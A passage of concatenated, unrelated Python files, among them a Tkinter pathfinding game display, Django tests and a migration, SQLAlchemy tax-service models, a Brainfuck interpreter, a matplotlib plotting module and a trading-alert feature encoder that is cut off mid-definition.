#Exibindo imagem inicial root.update_idletasks() root.update() time.sleep(0.5) imglabel[5-policiaY][policiaX-1] = Label(root, image=imgbranco).grid(row=5-policiaY, column=policiaX-1) imglabel2 = Label(root, image=imgpoli).grid(row=5-int(listaTemp[0][1]), column=int(listaTemp[0][0])-1) tinhaEscada = False #Executando em loop a seguinte ordem: redesenha o lugar do mapa onde estava o policial; redesenha o policial; e aguarda um tempo até a próxima exibição (realizado desta maneira, uma vez que o processamento já foi realizado pela maquina de inferencia prolog) for i in range (1, len(listaTemp)): colunaA = int(listaTemp[i-1][0]) linhaA = int(listaTemp[i-1][1]) coluna = int(listaTemp[i][0]) linha = int(listaTemp[i][1]) if(tinhaEscada): imglabel[5-linhaA][colunaA-1] = Label(root, image=imgesc).grid(row=5-linhaA, column=colunaA-1) else: imglabel[5-linhaA][colunaA-1] = Label(root, image=imgbranco).grid(row=5-linhaA, column=colunaA-1) if(temEscada(escada, coluna, linha)): imglabel2 = Label(root, image=imgPoliEsc).grid(row=5-linha, column=coluna-1) tinhaEscada = True else: imglabel2 = Label(root, image=imgpoli).grid(row=5-linha, column=coluna-1) tinhaEscada = False root.update_idletasks() root.update() time.sleep(0.5) root.mainloop() root.destroy() root = Tk() root.title("Relatorio") Label(root, text="Fantasma WIN").grid(row=0) Label(root, text="Foi possivel encontrar um caminho").grid(row=1) root.mainloop() else: #Instanciação do objeto TK para interface gráfica root = Tk() root.title("Demonstrativo do caminho") Button(root, text='Quit', command=root.quit).grid(row=6, column=5, sticky=W, pady=3) #Configurando as camadas de exibição imgbranco = ImageTk.PhotoImage(Image.open("Image/branco.png")) imgpoli = ImageTk.PhotoImage(Image.open("Image/policial.png")) imgladrao = ImageTk.PhotoImage(Image.open("Image/ladrao.png")) imgcar = ImageTk.PhotoImage(Image.open("Image/carrinho.png")) imgesc = ImageTk.PhotoImage(Image.open("Image/escada.png")) imgPoliEsc = ImageTk.PhotoImage(Image.open("Image/policiaEscada.png")) #Criando a primeira camada (mapa) imglabel = [] for i in range (0,5): linha = [] for j in range (0,10): if([j+1,5-i] in carrinho): linha.append(Label(root, image=imgcar).grid(row=i, column=j)) else: linha.append(Label(root, image=imgbranco).grid(row=i, column=j)) imglabel.append(linha) #Impressão das escadas for i in range(0, len(escada)): imglabel[5-escada[i][2]][escada[i][1]-1] = Label(root, image=imgesc).grid(row=5-escada[i][1], column=escada[i][2]-1) imglabel[5-escada[i][2]][escada[i][0]-1] = Label(root, image=imgesc).grid(row=5-escada[i][0], column=escada[i][2]-1) #Criando a camada do policial imglabel2 = Label(root, image=imgpoli).grid(row=5-policiaY, column=policiaX-1) imglabel2 = Label(root, image=imgladrao).grid(row=5-ladraoY, column=ladraoX-1) #Exibindo imagem inicial root.mainloop() root.destroy() root = Tk() root.title("Relatorio") Label(root, text="Pac-Man WIN").grid(row=0) Label(root, text="Não foi possivel encontrar um caminho").grid(row=1) root.mainloop()
from setuptools import setup setup( name='security-webcam', version='0.1', author='Hsuan-Hau Liu', description='Simple security camera system right on your computer.', url='https://github.com/hsuanhauliu/security-webcam', packages=['security_webcam',], package_dir={'security_webcam': 'src/security_webcam'}, install_requires=[ 'opencv-python>=4.1.1.26', 'numpy>=1.17.4' ], entry_points={ 'console_scripts': [ 'security_webcam=src.security_webcam.__main__:main' ] }, python_requires='>=3.6' )
# Generated by Django 2.0.5 on 2018-05-31 13:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('blog', '0006_auto_20180531_1458'), ] operations = [ migrations.AddField( model_name='post', name='description', field=models.TextField(default='Two-three sentences as a description'), ), ]
''' import os filelist=os.listdir(r"C:\\Users\\ehuamay\\Desktop\\pm_report_tags") #print(filelist) for file in filelist: if os.path.isdir("C:\\Users\\ehuamay\\Desktop\\pm_report_tags\\"+file): print("文件夹", file) else: print("文件", file) ''' import os def getall(path): filelist=os.listdir(path) for filename in filelist: filepath=os.path.join(path, filename) if os.path.isdir(filepath): print("文件夹", filename) getall(filepath) else: print("文件", filename) getall(r"C:\Users\ehuamay\Desktop\pm_report_tags")
import enum from botmanlib.models import Database, BaseUser, UserPermissionsMixin, BasePermission, BaseUserSession, UserSessionsMixin from sqlalchemy import Column, Float, Integer, Enum, String, ForeignKey, DateTime from sqlalchemy.orm import object_session, relationship database = Database() Base = database.Base class User(Base, BaseUser, UserPermissionsMixin, UserSessionsMixin): __tablename__ = 'users' def init_permissions(self): session = object_session(self) if session is None: session = database.DBSession for permission in ['start_menu_access', ]: perm = session.query(Permission).get(permission) if perm not in self.permissions: self.permissions.append(perm) class Permission(BasePermission, Base): __tablename__ = 'permissions' class ServiceType(enum.Enum): urban = 'urban' district = 'district' regional = 'regional' def to_str(self): if self is ServiceType.urban: return "Городская" elif self is ServiceType.district: return "Районная" elif self is ServiceType.regional: return "Региональная" else: return "Неизвестно" class PaymentType(enum.Enum): value_added_tax = 'value added tax' income_tax = 'income tax' penalty_for_tax_evasion = 'penalty for tax evasion' def to_str(self): if self is PaymentType.value_added_tax: return "Налог на добавленную стоимость" elif self is PaymentType.income_tax: return "Подоходный налог" elif self is PaymentType.penalty_for_tax_evasion: return "Штраф за уклонение от уплаты налогов" else: return "Неизвестно" class EmployeeEducation(enum.Enum): higher_education = 'higher education' secondary_technical_education = 'secondary technical education' secondary_education = 'secondary education' specialized_secondary_education = 'specialized secondary education' def to_str(self): if self is EmployeeEducation.higher_education: return "Высшее образование" elif self is EmployeeEducation.secondary_technical_education: return "Среднее техническое образование" elif self is EmployeeEducation.secondary_education: return "Среднее образование" elif self is EmployeeEducation.specialized_secondary_education: return "Среднее специальное образование" else: return "Неизвестно" class CompanyType(enum.Enum): state = 'state' private = 'private' ZAO = 'ZAO' OAO = 'OAO' OOO = 'OOO' def to_str(self): if self is CompanyType.state: return "Государственное" elif self is CompanyType.private: return "Частное" elif self is CompanyType.ZAO: return "ЗАО" elif self is CompanyType.OAO: return "ОАО" elif self is CompanyType.OOO: return "ООО" else: return "Неизвестно" class EmployeePayment(Base): __tablename__ = 'employee_payment_association_table' employee_id = Column(Integer, ForeignKey('employees.id'), primary_key=True) employee = relationship("Employee") payment_id = Column(Integer, ForeignKey('payments.id'), primary_key=True) payment = relationship("Payment") class TaxationService(Base): __tablename__ = 'taxation_services' id = Column(Integer, primary_key=True) type = Column(Enum(ServiceType), default=ServiceType.regional) name = Column(String, nullable=False) city = Column(String, nullable=False) year = Column(Integer, nullable=False) phone = Column(String, nullable=False) address = Column(String, nullable=False) employees = relationship("Employee", back_populates='taxation_service', cascade='all ,delete') payments = relationship("Payment", back_populates='taxation_service', cascade='all, delete') class Employee(Base): __tablename__ = 'employees' id = Column(Integer, primary_key=True) FIO = Column(String, nullable=False) date_of_birth = Column(DateTime, nullable=False) position = Column(String, nullable=False) salary = Column(Integer, nullable=False, default=0) educational_degree = Column(Enum(EmployeeEducation), default=EmployeeEducation.specialized_secondary_education) taxation_service_id = Column(Integer, ForeignKey('taxation_services.id'), nullable=False) taxation_service = relationship("TaxationService", back_populates="employees") payment = relationship("Payment", secondary=EmployeePayment.__table__, back_populates="employee", lazy='joined') class Payment(Base): __tablename__ = 'payments' id = Column(Integer, primary_key=True) date = Column(DateTime, nullable=False) amount = Column(Float, nullable=False) type = Column(Enum(PaymentType), default=PaymentType.income_tax) taxation_service_id = Column(Integer, ForeignKey('taxation_services.id'), nullable=False) taxation_service = relationship("TaxationService", back_populates="payments") companies = relationship("Company", back_populates='payment', cascade='all ,delete') employee = relationship("Employee", secondary=EmployeePayment.__table__, lazy='joined') class Company(Base): __tablename__ = 'companies' id = Column(Integer, primary_key=True) type = Column(Enum(CompanyType), default=CompanyType.OOO) name = Column(String, nullable=False) year = Column(Integer, nullable=False) phone = Column(String, nullable=False) employees_quantity = Column(Integer, nullable=False) payment_id = Column(Integer, ForeignKey('payments.id'), nullable=False) payment = relationship("Payment", back_populates="companies") class UserSession(BaseUserSession, Base): __tablename__ = 'user_sessions' DBSession = database.create_session("DBSession") BlockSession = database.create_session("BlockSession")
from flask.ext.wtf import Form from wtforms import StringField, PasswordField, validators from wtforms.fields.html5 import EmailField from wtforms.validators import Required class LoginForm(Form): user_name = StringField('user_name', [validators.Required()]) user_password = PasswordField('Password', [validators.DataRequired()])
""" 首先谈到这个语言的定义和运行原理 该语言定义在这样一个环境之上: 你有一列无限长的小火车,每个车厢里装了一个数字,初始为0。 还有一个列车员,初始在最头上那节车厢上。 好了,你把你写的BrainFK程序交给列车员,列车员会做如下的事情: 从左向右、由上自下一个字符一个字符地读取你的程序 当读到`+`的时候,将所在车厢里的数字加一 当读到`-`的时候,将所在的车厢里的数字减一 当读到`>`的时候,跑到后一个车厢去 当读到`<`的时候,跑到前一个车厢去 当读到`[`的时候,如果该车厢里面的数字为0,则跳去执行下一个`]`之后的程序内容 当读到`]`的时候,如果该车想里面的数字不为0,则跳去执行上一个`[`之后的程序内容 当读到`.`的时候,将所在车厢里面的数字翻译成ASCII字符,显示在你的屏幕上 当读到`,`的时候,从等待使用者输入一个ASCII字符,转码成数字写进所在车厢里 """ class Tape(object): """ 纸带 """ def __init__(self): self.tape = [0] self.position = 0 def get(self): return self.tape[self.position] def set(self, val): self.tape[self.position] = val def inc(self): self.tape[self.position] += 1 def dec(self): self.tape[self.position] -= 1 def forward(self): self.position += 1 if len(self.tape) <= self.position: self.tape.append(0) def backward(self): self.position -= 1 class BrainFuck(object): def __init__(self,program,tape_obj): self.program = program # program that you're going to interpret self.pairs = {} self.record() self.tape = tape_obj def record(self): """遍历一次代码,记录'['和']'的相对位置""" left_stack = [] for i,p in enumerate(self.program): if p == '[': left_stack.append(i) if p == ']': left = left_stack.pop() right = i self.pairs[left] = right self.pairs[right] = left def parse(self): values = [] pc = 0 while pc < len(self.program): p = self.program[pc] if p == '+': self.tape.inc() elif p == '-': self.tape.dec() elif p == '>': self.tape.forward() elif p == '<': self.tape.backward() elif p == '[': if self.tape.get() == 0: pc = self.pairs[pc] # 到下一个]所在的地方 elif p == ']': if self.tape.get() != 0: pc = self.pairs[pc] elif p == '.': values.append(chr(self.tape.get())) elif p == ',': self.tape.set(input()) pc += 1 return ''.join(values) if __name__ == '__main__': p = """++++++++++[>+++++++>++++++++++>+++>+<<<<-] >++.>+.+++++++..+++.>++.<<+++++++++++++++. >.+++.------.--------.>+.>.""" p2 = '[-]>[-]>[-]++++[<+++++>-]<+++[<+++++>-]<. >++[<----->-]<-. ---.' tobj = Tape() obj = BrainFuck(p,tobj) print(obj.parse())
from __future__ import division import warnings import sys sys.path.extend(['..', '../..']) with warnings.catch_warnings(): warnings.filterwarnings("ignore") from matplotlib import pyplot, rc, cm, font_manager from matplotlib.mpl import colorbar from matplotlib.ticker import MultipleLocator from cogent.util.progress_display import display_wrap from matplotlib.font_manager import FontProperties from chippy.util.run_record import RunRecord from math import log10, floor, ceil ColorbarBase = colorbar.ColorbarBase __author__ = 'Gavin Huttley, Cameron Jack' __copyright__ = 'Copyright 2011-2013, Gavin Huttley, Cameron Jack, Anuj Pahwa' __credits__ = ['Gavin Huttley', 'Cameron Jack'] __license__ = 'GPL' __maintainer__ = 'Cameron Jack' __email__ = 'cameron.jack@anu.edu.au' __status__ = 'pre-release' __version__ = '0.2' class FigureDetails(object): """ A 'lite' Plottable object to aid in passing useful information to plotting code. Should likely be merged with _Plottable. """ def __init__(self, x_size=5, y_size=3, title=None, x_text=None, y_text=None): self.x_size = x_size self.y_size = y_size self.title = title self.x_text = x_text self.y_text = y_text class _Plottable(object): """ Base class for handling plotting. Defines the appearance of a plot. """ def __init__(self, height, width, bgcolor, grid_off, pad=10, xaxis_lims=None, yaxis_lims=None, xy_tick_spaces=None, xy_tick_intervals=None, offset_ticks=False, linewidth=2, title_size=18, font=None, xy_label_fontsizes=(12,12), vline=None, legend_font_size=10, ioff=None, colorbar=False, clean=False): """ height, width = physical size of plot in inches bgcolor = background color {black | white} grid_off = True|False (default False) pad = tick mark padding xaxis_lims = (x_min, x_max) yaxis_lims = (y_min, y_max) xy_tick_spaces = (x, y) tick spacing xy_tick_intervals = (x, y) display values for ticks every n (int) linewidth = thickness of plot lines xy_label_fontsizes = (x, y) font size for axis labels title_size = font size for title font = different font or None:default (Vera Sans) vline = (x, width, style, color) legend_font_size = font size for the plot legend ioff = interactive plot (True is passed in by default) colorbar = include a color scale bar with the plot clean = removes top and right plot edges and their tick marks """ super(_Plottable, self).__init__() if ioff is not None: pyplot.ioff() rc('xtick.major', pad=pad) rc('xtick.minor', pad=pad) self.height = height self.width = width self._set_background(bgcolor, grid_off, vline) self.xlims = xaxis_lims self.ylims = yaxis_lims self.vline = vline self.legend_font_size = legend_font_size self.linewidth = linewidth self.xlabel_fontsize, self.ylabel_fontsize = xy_label_fontsizes self.xtick_space, self.ytick_space = xy_tick_spaces self.font = font self.title_size = title_size self.xtick_interval, self.ytick_interval = xy_tick_intervals self.offset_ticks = offset_ticks self.fig = None self.ax = None self._legend_patches = [] self._legend_labels = [] self._line_collection = [] self._colorbar = colorbar self.clean = clean ### private helper methods def _auto_grid_lines(self, y_diff, test_run=False): """ Returns a float that is a 'round' looking number to use for the grid lines """ rr = RunRecord('_auto_grid_lines') if y_diff > 0: ypower = log10(y_diff) if ypower < 0: rounding_places = 0 - int(floor(ypower)) y_diff = float(ceil(y_diff*(10**rounding_places))/\ (10**rounding_places)) grid_line_val = y_diff/10.0 else: y_ceiling = ceil(y_diff) if y_ceiling <= 10: grid_line_val = round(y_ceiling/10.0, 1) else: grid_line_val = y_ceiling/10.0 else: rr.dieOnCritical('Y-axis length must be greater than 0', y_diff) if test_run: rr.addInfo('Y-grid-line spacing', '%e' % grid_line_val) return grid_line_val def _auto_y_lims(self, minY, maxY, rounding=True, test_run=False): """ Takes a list of plotlines. Returns ylims(y_min_limit, y_max_limit) Defaults to min = 0.0, max = 1.0 """ rr = RunRecord('_auto_y_lims') y_floor = minY y_ceiling = maxY if rounding: # Round min/max values to whole values for nice plots # For fractional counts then scale the rounding appropriately if maxY > 0: ypower = log10(maxY) # check scale if ypower < 0: rounding_places = 0 - int(floor(ypower)) y_ceiling = float(ceil(maxY * (10**rounding_places))/ (10**rounding_places)) y_floor = float(floor(minY * (10**rounding_places))/ (10**rounding_places)) elif ypower == 0: y_floor = 0.0 y_ceiling = 1.0 else: # round up to 2 significant digits ypower = ceil(log10(maxY)) y_ceiling = ceil( maxY/(10**(ypower-1)) ) * (10**(ypower-1)) y_floor = floor(minY) elif maxY == 0: y_floor = 0.0 y_ceiling = 1.0 else: rr.dieOnCritical('Negative max y-axis value', maxY) if test_run: rr.addInfo('Y-axis min', minY) rr.addInfo('Y-axis max', maxY) rr.addInfo('Y-axis auto floor', y_floor) rr.addInfo('Y-axis auto ceiling', y_ceiling) return tuple([y_floor, y_ceiling]) def getFigureAndAxes(self, title=None, xlabel=None, ylabel=None): """returns the figure and axis ready for display""" if self.fig is not None: return self.fig, self.ax font = None if self.font is not None: font = FontProperties(font=self.font) if self.xlabel_fontsize: rc('xtick', labelsize=self.xlabel_fontsize, font=font) if self.ylabel_fontsize: rc('ytick', labelsize=self.ylabel_fontsize, font=font) else: if self.xlabel_fontsize: rc('xtick', labelsize=self.xlabel_fontsize) if self.ylabel_fontsize: rc('ytick', labelsize=self.ylabel_fontsize) fig = pyplot.figure(figsize=(self.width, self.height)) if self._colorbar: ax = fig.add_axes([0.1, 0.1, 0.8, 0.8]) else: ax = pyplot.gca() ax_kwargs = {} if self.xlims is not None: ax_kwargs['xlim'] = self.xlims if self.ylims is not None: ax_kwargs['ylim'] = self.ylims pyplot.setp(ax, **ax_kwargs) if self.xtick_space is not None: major_locator = MultipleLocator(self.xtick_space) ax.xaxis.set_major_locator(major_locator) if self.ytick_space is not None: major_locator = MultipleLocator(self.ytick_space) ax.yaxis.set_major_locator(major_locator) if self.bgcolor is not None: ax.set_axis_bgcolor(self.bgcolor) if self.xtick_interval is not None: xticks = ax.xaxis.get_major_ticks() for i, xtick in enumerate(xticks): if self.offset_ticks: d, r = divmod(i-1+self.xtick_interval/2, self.xtick_interval) else: d, r = divmod(i-1, self.xtick_interval) xtick.set_visible(False) if r == 0: xtick.set_visible(True) if self.ytick_interval is not None: yticks = ax.yaxis.get_major_ticks() for i, ytick in enumerate(yticks): if self.offset_ticks: d, r = divmod(i-1+self.ytick_interval/2, self.ytick_interval) else: d, r = divmod(i-1, self.ytick_interval) ytick.set_visible(False) if r == 0: ytick.set_visible(True) if self.vline is not None: # e.g. x=0, ymin=0, ymax=1, linewidth=3, linestyle='-.', color='w' ax.axvline(**self.vline) if self.grid: ax.grid(**self.grid) if title and font: pyplot.title(title, fontsize=self.title_size, font=font) elif title: pyplot.title(title, fontsize=self.title_size) if ylabel: pyplot.ylabel(ylabel, fontsize=self.ylabel_fontsize) if xlabel: pyplot.xlabel(xlabel, fontsize=self.xlabel_fontsize) ax.ticklabel_format(scilimits=(-2,4), axis='y') ax.ticklabel_format(scilimits=(-5,5), axis='x') self.fig = fig if self.clean is True: for loc, spine in ax.spines.iteritems(): if loc in ['right','top']: spine.set_color('none') # don't draw spine ax.xaxis.set_ticks_position('bottom') ax.yaxis.set_ticks_position('left') self.ax = ax return self.fig, self.ax def _set_background(self, bgcolor, grid_off, vline): """ Called during initialisation. Sets the background to either black or white. bgcolor = 'black'|'white' vline = (x, width, style, color) """ x, vline_width, vline_style, vline_color = vline if bgcolor.lower() == 'black': if grid_off is True: self.grid = False else: self.grid = {'color': 'w'} vline_color = 'w' self.bgcolor='0.0' else: if grid_off is True: self.grid = False else: self.grid = {'color': 'k'} vline_color = 'k' self.bgcolor = '1.0' if not grid_off: self.vline = dict(x=x, linewidth=vline_width, linestyle=vline_style, color=vline_color) def setAxes(self, plot_lines, plot_CI=False, test_run=False): """ Gets called by the __call__ method but is also available for re-scaling of plots. 1) Set the axes to y_min_limit and y_max_limit or call auto-calculate. 2) Set y-tick-space or auto-calculate """ rr = RunRecord('setAxes') if not self.ylims: minY = self.getMinY(plot_lines, plot_CI) maxY = self.getMaxY(plot_lines, plot_CI) self.ylims = self._auto_y_lims(minY, maxY, test_run=test_run) y_min_limit, y_max_limit = self.ylims # set grid-lines/tick marks if not self.ytick_space: self.ytick_space = self._auto_grid_lines(y_max_limit-y_min_limit, test_run=test_run) if not self.ytick_interval: self.ytick_interval = 2 rr.addInfo('Y-max plot limit', '{:e}'.format(y_max_limit)) rr.addInfo('Y-min plot limit', '{:e}'.format(y_min_limit)) rr.addInfo('Y-grid-line spacing', '{:e}'.format(self.ytick_space)) ### public methods for detailing a plottable object def ion(self): pyplot.ion() def show(self): pyplot.show() def savefig(self, filename, image_format='pdf'): pyplot.savefig(filename, format=image_format) def legend(self, fontsize=None): if self._legend_patches: if fontsize is None: prop = font_manager.FontProperties(size=self.xlabel_fontsize) else: prop = font_manager.FontProperties(size=fontsize) pyplot.legend(self._legend_patches, self._legend_labels, prop=prop) def checkYAxisScale(self, plot_lines, plot_CI=False): """ Compare the set y-axis limits to the actual limits of the data """ rr = RunRecord('checkYAxisScale') maxY = self.getMaxY(plot_lines, plot_CI) minY = self.getMinY(plot_lines, plot_CI) if self.ylims is not None: if maxY > self.ylims[1]: rr.addWarning('ylimit may be too small, ymax=', str(maxY)) elif maxY*2 < self.ylims[1]: rr.addWarning('ylimit may be too large, ymax=', str(maxY)) if minY < self.ylims[0]: rr.addWarning('ylimit may be too small, ymin=', str(minY)) elif minY/2 > self.ylims[0]: rr.addWarning('ylimit may be too large, ymin=', str(minY)) else: rr.addWarning('y-axis limits', 'Not set') def getMaxY(self, plot_lines, plot_CI=False): maxY = 0 # plots are never totally negative for line in plot_lines: peak = line.getMaxCount(include_stderr=plot_CI, se_adjust=1.96) if peak > maxY: maxY = peak return maxY def getMinY(self, plot_lines, plot_CI=False): minY = plot_lines[0].counts[0] # better than starting at zero for line in plot_lines: peak = line.getMinCount(include_stderr=plot_CI, se_adjust=1.96) if peak < minY: minY = peak return minY ### Public classes implementing Plottable class PlottableSingle(_Plottable): """Plots a single line""" def __init__(self, *args, **kwargs): super(PlottableSingle, self).__init__(*args, **kwargs) @display_wrap def __call__(self, x_array, plot_lines=None, clean=False, xlabel=None, ylabel=None, title=None, plot_CI=False, ui=None): rr = RunRecord('PlottableSingle__call__') self.setAxes(plot_lines, plot_CI=plot_CI, test_run=False) self.checkYAxisScale(plot_lines, plot_CI=plot_CI) self.fig, self.ax = self.getFigureAndAxes(title=title, xlabel=xlabel, ylabel=ylabel) self.clean=clean for i, line in ui.series(enumerate(sorted(plot_lines, key=lambda line: (line.study,line.rank), reverse=True)), noun='Applying lines to plot'): self.ax.plot(x_array, line.counts, color=line.color, linewidth=self.linewidth) # Show confidence interval around each line if plot_CI: #set shading alpha alpha = line.color[3] if alpha is None: alpha = 0.9 upper = 1.96 * line.stderr + line.counts lower = -1.96 * line.stderr + line.counts self.ax.fill_between(x_array, upper, lower, alpha=alpha/2.5, color=line.color) class PlottableGroups(_Plottable): """plot groups of data on the same panel""" def __init__(self, *args, **kwargs): super(PlottableGroups, self).__init__(*args, **kwargs) @display_wrap def __call__(self, x_array, plot_lines, colorbar=False, clean=False, xlabel=None, ylabel=None, title=None, filename_series=None, labels_size=None, show_legend=False, plot_CI=False, ui=None): rr = RunRecord('PlottableGroups__call__') if not plot_lines: rr.dieOnCritical('No data supplied', 'Failed') self.setAxes(plot_lines, plot_CI=plot_CI, test_run=False) self.checkYAxisScale(plot_lines, plot_CI=plot_CI) self.fig, self.ax = self.getFigureAndAxes(title=title, xlabel=xlabel, ylabel=ylabel) self.clean=clean if colorbar: # probably need to set a limit on how big this will be ax2 = self.fig.add_axes([0.925, 0.1, 0.025, 0.8]) cb = ColorbarBase(ax2, ticks=[0.0, 1.0], cmap=cm.RdBu, orientation='vertical') cb.set_ticklabels(['Low', 'High']) ax = self.fig.sca(self.ax) # need to make main axis the current axis again legend_lines = {} for i, line in ui.series(enumerate(sorted(plot_lines, key=lambda line: (line.study,line.rank), reverse=True)), noun='Applying lines to plot'): self.ax.plot(x_array, line.counts, color=line.color, linewidth=self.linewidth) if show_legend: if line.study in legend_lines.keys(): if line.rank < legend_lines[line.study].rank: legend_lines[line.study] = line else: legend_lines[line.study] = line #if filename_series is not None: # pyplot.savefig(filename_series[i]) # Show confidence interval around each line if plot_CI: #set shading alpha alpha = line.alpha upper = 1.96 * line.stderr + line.counts lower = -1.96 * line.stderr + line.counts self.ax.fill_between(x_array, upper, lower, alpha=alpha/2.5, color=line.color) if show_legend: self.legend(labels_size) l_lines = [line for line in sorted(legend_lines.values(), key=lambda x: x.study)] p_lines = [self.ax.plot(x_array, l.counts, color=l.color, linewidth=self.linewidth)[0] for l in l_lines] study_names = [l.study for l in l_lines] self.ax.legend(p_lines, study_names)
from django.core import mail from django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.forms import SubscriptionForm from eventex.subscriptions.models import Subscription class SubscriptionsNewGet(TestCase): def setUp(self): self.resp = self.client.get(r('subscriptions:new')) def test_get(self): ''' GET /inscricao/ must return status code 200 ''' self.assertEqual(200, self.resp.status_code) def test_template(self): ''' Must use subscriptions/subscription_form.html ''' self.assertTemplateUsed( self.resp, 'subscriptions/subscription_form.html') def test_html(self): ''' Html must contain input tags ''' tags = (('<form', 1), ('<input', 5), ('type="text"', 3), ('type="email"', 1), ('type="submit"', 1)) for text, count in tags: with self.subTest(): self.assertContains(self.resp, text, count) def test_csrf(self): ''' Html must contain csrf ''' self.assertContains(self.resp, 'csrfmiddlewaretoken') def test_has_form(self): ''' Context must have subscription form ''' form = self.resp.context['form'] self.assertIsInstance(form, SubscriptionForm) class SubscriptionsNewPostValid(TestCase): def setUp(self): data = dict( name='Regis da Silva', cpf='71124336656', email='regis@example.com', phone='11-91234-5678') self.resp = self.client.post(r('subscriptions:new'), data) def test_post(self): ''' Valid POST should redirect to /inscricao/1/ ''' self.assertRedirects(self.resp, r('subscriptions:detail', 1)) def test_send_subscribe_email(self): self.assertEqual(1, len(mail.outbox)) def test_save_subscription(self): self.assertTrue(Subscription.objects.exists()) class SubscriptionsNewPostInvalid(TestCase): def setUp(self): self.resp = self.client.post(r('subscriptions:new'), {}) def test_post(self): ''' Invalid POST should not redirect ''' self.assertEqual(200, self.resp.status_code) def test_template(self): self.assertTemplateUsed( self.resp, 'subscriptions/subscription_form.html') def test_has_form(self): form = self.resp.context['form'] self.assertIsInstance(form, SubscriptionForm) def test_form_has_errors(self): form = self.resp.context['form'] self.assertTrue(form.errors) def test_dont_save_subscription(self): self.assertFalse(Subscription.objects.exists()) class TemplateRegressionTest(TestCase): def test_template_has_non_field_errors(self): invalid_data = dict(name='Regis da Silva', cpf='71124336656') response = self.client.post(r('subscriptions:new'), invalid_data) self.assertContains(response, '<ul class="errorlist nonfield">')
import sys import io import os import json import time import classify_utils from subprocess import * import subprocess import re # argv[1] - filename to process # using https://pypi.org/project/LatvianStemmer/1.0.1/#files # processed file is saved in the same dir as source as filename_stemmed.tsv def main(): filename = os.path.splitext(sys.argv[1])[0] filename_clean = filename + "_stopwords.tsv" try: os.remove(filename_clean) except OSError: pass stopWords = [] with open ('stopwords_garkaje.txt','rb') as stopWordsFile: for line in stopWordsFile: line = line.decode('utf-8-sig') stopWords.append(line.strip()) with open(sys.argv[1],'rb') as f: for line in f: line = line.decode('utf-8') parts = line.split("\t") tweetText = parts[1] cleanText = "" # if there is punctuation, insert space between tweetText = re.sub(r'[.]+ ',' , ',tweetText) tweetText = re.sub(r'[,]+ ',' , ',tweetText) tweetText = re.sub(r'[?]+ ',' ? ',tweetText) tweetText = re.sub(r'[!]+ ',' ! ',tweetText) words = tweetText.split() for word in words: if (word not in stopWords): cleanText = cleanText + " " + word # for stopWord in stopWords: # # tweetText = re.sub(stopWord,' ',tweetText) # tweetText = tweetText.replace(stopWord," ") # cleanText = tweetText clean_line = parts[0]+"\t"+cleanText+"\t"+parts[2] with open(filename_clean,'ab') as fout: fout.write(clean_line.encode("utf-8")) # execute only if run as a script if __name__ == "__main__": main()
from typing import List import collections class RLEIterator: def __init__(self, encoding: List[int]): self.encode = collections.deque(encoding) def next(self, n: int) -> int: while self.encode: if self.encode[0] < n: n -= self.encode.popleft() self.encode.popleft() elif self.encode[0] == n: self.encode.popleft() return self.encode.popleft() else: self.encode[0] -= n return self.encode[1] return -1 # Your RLEIterator object will be instantiated and called as such: # obj = RLEIterator(encoding) # param_1 = obj.next(n)
from tkinter import * def do_some_action(): if choosen.get() == 'czerwony': button["background"] = 'red' else: button["background"] = 'yellow' root = Tk() root.title("Radiobuttons") root.geometry("250x150") choosen = StringVar() # klasa nalezaca do tkinker, sluzy do prezchowywania stanu przyciskow choosen.set(None) # ustawianie poczatkowej wartosci, zaden z radiobuttonow nie jest wybrany Radiobutton(text="Zmien tlo na czerwony", variable = choosen, value='czerwony').grid(sticky=W) Radiobutton(text="Zmien tlo na zolty", variable = choosen, value='zolty').grid(sticky=W) button = Button(root, text="Action", command=do_some_action) button.grid(sticky=N+S+W+E) root.mainloop() # ex86_gui_radio.py
class Feature_Coding: def __init__(self): self.featuresAll = ['TimeStamp', 'Symbol', 'Exchange', 'Type', 'PeriodCode', 'EventId', 'EventCode', 'EventDir', 'Price', 'VWAPP', 'Open', 'High', 'Low', 'Close', 'Volume', 'PIR5m', 'PIR15m', 'PIR60m', 'PIRD', 'PIRYD', 'PIR5D', 'PIR10D', 'PIR20D', 'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15', 'MarketTrend_5', 'MarketTrend_1'] self.featuresSel = ['TimeStamp', 'Type', 'TypeCode', 'Quote', 'Period', 'MarketTrend_D', 'MarketTrend_60', 'MarketTrend_15', 'MarketTrend_5', 'MarketTrend_1', 'Label', 'Profit'] # self.featuresSel = ['TimeStamp', 'Type', 'TypeCode', 'PeriodCode', 'Dir', 'MarketTrendCode'] self.predFeatures = ['TypeCode'] self.nfeatures = len(self.featuresSel) # specify features by type self.CONTINUOUS_COLS = [] self.CATEGORICAL_COLS = ['Type', 'Period', 'MarketTrend'] self.periodDict = {'PERIOD_1_MIN': 1, 'PERIOD_5_MIN': 5, 'PERIOD_15_MIN': 15, 'PERIOD_60_MIN': 60, 'PERIOD_TODAY': 1440} self.periodCodeDict = {'1': 1, '5': 5, '15': 15, '60': 60, 'D': 1440} self.alertTrendDict = {'Neutral': 1, 'Bullish': 2, 'Bearish': 3} self.marketTrendDict = { 'Unknown': 1, 'Neutral': 2, 'RangeBound': 3, 'UptrendStarting': 4, 'Uptrend': 5, 'UptrendPullback': 6, 'UptrendEnding': 7, 'DowntrendStarting': 8, 'Downtrend': 9, 'DowntrendPullback': 10, 'DowntrendEnding': 11, 'UptrendContinuing': 12, 'DowntrendContinuing': 13} self.eventCodes = [ 'BBLU', 'BBLD', 'BBHU', 'BBHD', 'HILMFU','HILMFD', 'HILFTU', 'HILFTD', 'MACDBBHU','MACDBBHD', 'MACDBBLU', 'MACDBBLD','MACDBBTU','MACDBBTD', 'PRCHU','PRCHD','PRCLU','PRCLD', 'PRCSHU', 'PRCSHD','PRCSLU', 'PRCSLD', 'PRCMHU', 'PRCMHD', 'PRCMLU', 'PRCMLD', 'PRCLHU','PRCLHD', 'PRCLLU','PRCLLD', 'SARSU','SARSD', 'SARRU', 'SARRD', 'RSI20U', 'RSI20D', 'RSI80U', 'RSI80D', 'MFI20U', 'MFI20D', 'MFI80U', 'MFI80D', 'EOMU', 'EOMD', 'SC20', 'SC20U', 'SC20D', 'SC80', 'SC80D', 'SC80U'] self.eventCodeDict = { 'HEARTB':0, 'VSX':1, 'VWAPD':2, 'VWAPU':3, 'BBLU':11, 'BBLD':12, 'BBHU':13, 'BBHD':14, 'HILMFU':21, 'HILMFD':22, 'HILFTU':23, 'HILFTD':24, 